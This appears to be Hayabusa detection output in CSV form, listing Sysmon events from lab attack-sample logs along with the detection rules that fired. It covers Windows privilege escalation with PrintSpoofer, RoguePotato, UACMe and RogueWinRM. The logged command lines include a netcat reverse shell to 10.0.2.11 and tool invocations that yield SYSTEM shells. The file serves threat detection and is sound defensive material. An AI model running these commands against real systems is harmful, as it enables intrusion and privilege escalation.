2020-04-26 07:19:28.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.068 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.079 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,Rule: PrivEsc - Potential Unquoted Service Exploit : Command: c:\Program Files\vulnsvc\mmm.exe : Path: C:\program.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.465 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:32.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: sihost.exe : Path: C:\Windows\System32\sihost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc : Path: C:\Windows\System32\svchost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:32.097 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService : Path: C:\Windows\System32\svchost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:32.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:35.125 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: MSEDGEWIN10\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:35.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:37.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:40.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:40.712 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications : Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:11.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:11.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 318 0000021FF2606500 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:11.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:16.073 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Discovery - domain time : Command: ""C:\BGinfo\BGINFO.EXE"" /accepteula /ic:\bginfo\bgconfig.bgi /timer:0 : Path: C:\BGinfo\BGINFO.EXE : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:16.165 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\SecurityHealthService.exe : Path: C:\Windows\System32\SecurityHealthService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:16.965 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe -Embedding : Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:18.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe"" /background : Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:21.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\regedit.exe"" : Path: C:\Windows\regedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:21.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 258 0000021FF266EC20 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:26.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\regedit.exe"" : Path: C:\Windows\regedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:21:08.564 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:21:18.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:21:19.340 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s WinRM : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:21:19.629 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-05-03 03:01:54.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PrintSpoofer.exe -i -c powershell.exe : Path: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: powershell.exe : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: PrintSpoofer.exe -i -c powershell.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: powershell.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-07 22:13:02.481 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\ChangePk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx
2020-05-10 09:09:36.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" : Path: C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:36.709 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:11:16.714 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-12 08:21:56.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 : Path: C:\Users\IEUser\Tools\PrivEsc\RoguePotato.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe : Path: C:\Users\IEUser\Tools\Misc\nc64.exe : User: NT AUTHORITY\SYSTEM : Parent Command: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.661 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: Akagi.exe 58 c:\Windows\System32\cmd.exe : Path: C:\Users\IEUser\Tools\PrivEsc\Akagi.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 328 310 0000028A37652590 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 : Path: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 09:28:16.122 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
2020-05-13 09:28:52.873 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
2020-05-13 09:28:52.914 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
2020-05-13 09:28:52.950 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation -p -s wcncsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
2020-05-24 10:13:47.756 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RogueWinRM.exe -p c:\Windows\System32\cmd.exe : Path: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
